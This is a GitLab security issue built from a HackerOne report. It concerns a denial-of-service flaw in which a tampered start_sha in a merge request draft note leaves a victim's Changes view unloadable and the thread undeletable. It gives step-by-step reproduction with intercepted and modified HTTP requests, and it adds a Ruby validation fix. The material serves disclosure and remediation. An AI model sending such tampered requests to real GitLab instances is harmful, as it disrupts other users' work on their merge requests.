Invalid 'start_sha' value in POST `/{group}/{project}/-/merge_requests/{id}/drafts` when commenting on merge requests leads to Changes being unable to load
:warning: **Please read [the process](https://gitlab.com/gitlab-org/release/docs/-/blob/master/general/security/developer.md) on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.**
**[HackerOne report #2058514](https://hackerone.com/reports/2058514)** by `toukakirishima` on 2023-07-09, assigned to `GitLab Team`:
[Report](#report) | [Attachments](#attachments) | [How To Reproduce](#how-to-reproduce)
## Report
##### Summary
I found a DoS vulnerability when commenting on a file in merge requests (on the *Changes* menu). I noticed that if **start_sha** is not validated first, it causes a DoS (the user can't load the file on the *Changes* menu and can't delete the thread).
Normally you can delete threads that you have created.

And can load files on *Changes* menu.

But as an attacker I can make the victim unable to load the file on the *Changes* menu and unable to delete the thread. Even an admin can't delete the thread.


Let's say Touka Attacker is the attacker and Touka Kirishima is the victim.

And Touka Kirishima (victim) made a merge request.

##### Steps to reproduce
1. Go to merge requests

2. Go to *Changes* menu

3. Comment on this file

4. Click Start a review and make sure Burp Suite is on. You will see a request like the following. Example:

```
POST /toukak/aaaa/-/merge_requests/4/drafts HTTP/2
Host: gitlab.com
Cookie: x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/plain, */*
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://gitlab.com/toukak/aaaa/-/merge_requests/4/diffs
X-Csrf-Token: x
X-Requested-With: XMLHttpRequest
Content-Type: application/json
Content-Length: 707
Origin: https://gitlab.com
Dnt: 1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
{"line_type":"old","merge_request_diff_head_sha":"d5d27e5e75cb66f567f39c7fe8ea2daea67f03a9","in_reply_to_discussion_id":"","note_project_id":"","target_type":"merge_request","target_id":235434679,"return_discussion":true,"draft_note":{"note":"Hehe","position":"{\"base_sha\":\"fe0ced6306a3fe0b992d2c4a9204169c1538279f\",\"start_sha\":\"fe0ced6306a3fe0b992d2c4a9204169c1538279f\",\"head_sha\":\"d5d27e5e75cb66f567f39c7fe8ea2daea67f03a9\",\"old_path\":\"hehe\",\"new_path\":\"hehe\",\"position_type\":\"file\",\"old_line\":null,\"new_line\":null,\"line_range\":{},\"ignore_whitespace_change\":false}","noteable_type":"MergeRequest","noteable_id":235434679,"commit_id":null,"type":"DiffNote","line_code":null}}
```

5. Send to Repeater
6. Change *start_sha*. Example:
```
POST /toukak/aaaa/-/merge_requests/4/drafts HTTP/2
Host: gitlab.com
Cookie: x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/plain, */*
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://gitlab.com/toukak/aaaa/-/merge_requests/4/diffs
X-Csrf-Token: x
X-Requested-With: XMLHttpRequest
Content-Type: application/json
Content-Length: 707
Origin: https://gitlab.com
Dnt: 1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
{"line_type":"old","merge_request_diff_head_sha":"d5d27e5e75cb66f567f39c7fe8ea2daea67f03a9","in_reply_to_discussion_id":"","note_project_id":"","target_type":"merge_request","target_id":235434679,"return_discussion":true,"draft_note":{"note":"Hehe","position":"{\"base_sha\":\"fe0ced6306a3fe0b992d2c4a9204169c1538279f\",\"start_sha\":\"fe0ced6306a3fe0b992d2c4a9204169c15382791\",\"head_sha\":\"d5d27e5e75cb66f567f39c7fe8ea2daea67f03a9\",\"old_path\":\"hehe\",\"new_path\":\"hehe\",\"position_type\":\"file\",\"old_line\":null,\"new_line\":null,\"line_range\":{},\"ignore_whitespace_change\":false}","noteable_type":"MergeRequest","noteable_id":235434679,"commit_id":null,"type":"DiffNote","line_code":null}}
```

7. Click Send
8. Finish and Submit review

9. Reload the page; you are unable to load the file on the *Changes* menu and can't delete the thread.
**POV from Attacker**


**POV from Victim**


##### POC

##### Relevant logs and/or screenshots
```
TypeError: this.discussion.diff_file is null
diffViewerMode diff_with_note.vue:44
VueJS 3
get
evaluate
Gr
isTextFile diff_with_note.vue:56
VueJS 3
get
evaluate
Gr
U diff_with_note.vue:1
VueJS 52
_render
r
get
t
mount
$mount
init
d
d
g
d
g
d
g
d
g
d
g
d
Lo
_update
r
get
t
mount
$mount
init
d
d
Lo
_update
r
get
t
mount
$mount
init
d
d
D
E
E
E
E
Lo
_update
r
get
run
mr
Cn
_n
instrument.js:108:32
kt instrument.js:108
VueJS 55
mn
gn
pn
_render
r
get
t
mount
$mount
init
d
d
g
d
g
d
g
d
g
d
g
d
Lo
_update
r
get
t
mount
$mount
init
d
d
Lo
_update
r
get
t
mount
$mount
init
d
d
D
E
E
E
E
Lo
_update
r
get
run
mr
Cn
_n
```
##### Output of checks
This bug happens on GitLab.com
#### Impact
- Attacker can make the victim unable to load the file on the *Changes* menu.
- Attacker can make the victim unable to delete the thread. Even an admin can't delete the thread.
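The root cause above is that the server stores a draft note whose `position` names a `start_sha` it never checked, so the note later has no diff file to render. The following is an added illustration of the missing server-side check, written for this issue and not GitLab's own code or its actual fix (which this page does not describe): it takes the `position` JSON string exactly as the request body carries it and rejects it unless its SHA triple is both well-formed and one the server has actually stored for the merge request. The `known_refs` shape (one base/start/head hash per stored diff version) is an assumption.

```ruby
require 'json'

# Added example, not GitLab code: validate a draft-note "position" before it is
# persisted. Field names follow the request body quoted in the report.
SHA_RE = /\A\h{40}\z/
SHA_KEYS = %w[base_sha start_sha head_sha].freeze

# Returns nil when the position is acceptable, otherwise a short reason string.
# known_refs: one {base_sha, start_sha, head_sha} hash per stored diff version
# of the merge request (assumed shape).
def position_error(position_json, known_refs)
  pos = JSON.parse(position_json)
  return 'position must be a JSON object' unless pos.is_a?(Hash)

  SHA_KEYS.each do |key|
    sha = pos[key]
    return "#{key} is missing or malformed" unless sha.is_a?(String) && sha.match?(SHA_RE)
  end

  # Well-formed is not enough: the tampered start_sha in the report is valid hex
  # of the right length. The triple must match a diff version the server holds,
  # otherwise the note points at a diff that can never be loaded.
  submitted = pos.slice(*SHA_KEYS)
  return nil if known_refs.any? { |refs| refs.slice(*SHA_KEYS) == submitted }

  'position SHAs do not match any diff version of this merge request'
rescue JSON::ParserError
  'position is not valid JSON'
end

# Constructed sample data reusing the SHAs quoted in the report.
KNOWN_DIFF_REFS = [{
  'base_sha' => 'fe0ced6306a3fe0b992d2c4a9204169c1538279f',
  'start_sha' => 'fe0ced6306a3fe0b992d2c4a9204169c1538279f',
  'head_sha' => 'd5d27e5e75cb66f567f39c7fe8ea2daea67f03a9'
}].freeze

def build_position(start_sha)
  JSON.generate(
    'base_sha' => 'fe0ced6306a3fe0b992d2c4a9204169c1538279f',
    'start_sha' => start_sha,
    'head_sha' => 'd5d27e5e75cb66f567f39c7fe8ea2daea67f03a9',
    'old_path' => 'hehe', 'new_path' => 'hehe', 'position_type' => 'file'
  )
end

LEGIT_POSITION = build_position('fe0ced6306a3fe0b992d2c4a9204169c1538279f')
TAMPERED_POSITION = build_position('fe0ced6306a3fe0b992d2c4a9204169c15382791')

puts "legit:    #{position_error(LEGIT_POSITION, KNOWN_DIFF_REFS).inspect}"
puts "tampered: #{position_error(TAMPERED_POSITION, KNOWN_DIFF_REFS).inspect}"
```

Rejecting the request at this point keeps the bad note out of the database; the Vue component in the trace (`diff_with_note.vue`) would additionally need to tolerate a null `diff_file` so that any note already stored cannot take the whole *Changes* view down.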
## Attachments
**Warning:** Attachments received through HackerOne, please exercise caution!
* [gambar.png](https://h1.sec.gitlab.net/a/86022423-2b23-492d-8329-bc80f883549e/gambar.png)
* [gambar.png](https://h1.sec.gitlab.net/a/3fa51848-bf05-4f18-9528-ed7124029d22/gambar.png)
* [gambar.png](https://h1.sec.gitlab.net/a/cc48d7d7-d80c-4f61-869e-a5159bd9764c/gambar.png)
* [Screenshot_10.png](https://h1.sec.gitlab.net/a/532402e8-aa83-4214-bce8-1176b683ce29/Screenshot_10.png)
* [gambar.png](https://h1.sec.gitlab.net/a/9da922d7-76ad-4b1a-8039-bd875243b2fd/gambar.png)
* [gambar.png](https://h1.sec.gitlab.net/a/9cee7975-83e1-4935-a184-28b550ff632a/gambar.png)
* [gambar.png](https://h1.sec.gitlab.net/a/008ebc15-a64a-4e3c-a641-a6009d85ff47/gambar.png)
* [gambar.png](https://h1.sec.gitlab.net/a/018998fc-4b4c-44ba-b03f-5b986bea2006/gambar.png)
* [Screenshot_12.png](https://h1.sec.gitlab.net/a/e6e46923-5539-45c7-81db-97ce1c091076/Screenshot_12.png)
* [gambar.png](https://h1.sec.gitlab.net/a/a419c293-81d7-43f9-8049-f78234f98ada/gambar.png)
* [gambar.png](https://h1.sec.gitlab.net/a/35e206cd-0ea3-4d31-b369-3c84dbc905fa/gambar.png)
* [Screenshot_13.png](https://h1.sec.gitlab.net/a/409a8909-39bc-4e7a-88e9-493a0c0157d1/Screenshot_13.png)
* [gambar.png](https://h1.sec.gitlab.net/a/b230572d-3b9b-4086-87ed-b54189a872b1/gambar.png)
* [Screenshot_14.png](https://h1.sec.gitlab.net/a/8edc0495-0056-4775-af78-fb81ce5d8345/Screenshot_14.png)
* [Screenshot_15.png](https://h1.sec.gitlab.net/a/eef02ee0-c7a6-4cb5-b4be-452e041f0846/Screenshot_15.png)
* [Screenshot_16.png](https://h1.sec.gitlab.net/a/665bfe63-f7a9-4fe6-9acb-6228f5681fcc/Screenshot_16.png)
* [gambar.png](https://h1.sec.gitlab.net/a/496890a9-7ac2-4bb3-870a-6c9b894eb737/gambar.png)
* [bandicam_2023-07-09_19-04-28-764.mp4](https://h1.sec.gitlab.net/a/14b09ed0-c2a6-4e98-b730-2f63519b020f/bandicam_2023-07-09_19-04-28-764.mp4)
## How To Reproduce
Please add [reproducibility information] to this section:
1.
1.
1.
[reproducibility information]: https://about.gitlab.com/handbook/engineering/security/#reproducibility-on-security-issues